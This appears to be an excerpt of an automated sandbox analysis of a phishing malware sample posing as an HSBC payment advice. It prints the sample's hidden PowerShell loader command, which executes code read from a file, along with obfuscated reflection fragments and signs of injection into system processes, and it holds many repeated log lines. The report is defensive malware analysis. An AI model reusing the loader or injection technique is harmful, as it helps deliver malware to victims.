    Source: Binary string: CallSite.Targetore.pdb) source: powershell.exe, 00000002.00000002.91926000124.00000000086E1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.91922466152.00000000072D7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tem.Core.pdbo source: powershell.exe, 00000002.00000002.91926485061.00000000087A0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdbn source: powershell.exe, 00000002.00000002.91922466152.00000000072D7000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    Source: Yara match | File source: 00000002.00000002.91928114130.0000000008F22000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Skybruddene $Elbowboardntragroupal $actinomorphy), (Bestyrelsesmdeers @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Preacknowledgments77 = [AppDomain]::C
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($bassiner)), $Georgist).DefineDynamicModule($Uflyttelig, $false).DefineType($Talks, $Ashy, [System.MulticastDelegate])$Folliculated.Def
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\tidsserier.Adj';$nijholt=$Finurligheden.SubString(56673,3);.$nijholt($Finurligheden) "
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\tidsserier.Adj';$nijholt=$Finurligheden.SubString(56673,3);.$nijholt($Finurligheden) "
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress, | 0_2_00406252
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_046486F8 push eax; mov dword ptr [esp], edx | 2_2_0464870C

    Hooking and other Techniques for Hiding and Protection

    Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: download (92).png
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9936
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Code function: 0_2_0040276E FindFirstFileW
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Code function: 0_2_0040622B FindFirstFileW,FindClose
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | API call chain: ExitProcess graph end node
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_02E2D6E4 LdrInitializeThunk
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section unmapped: C:\Windows\SysWOW64\msiexec.exe, base address: 400000
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section unmapped: C:\Windows\SysWOW64\dxdiag.exe, base address: 400000
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section unmapped: unknown, base address: 400000
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
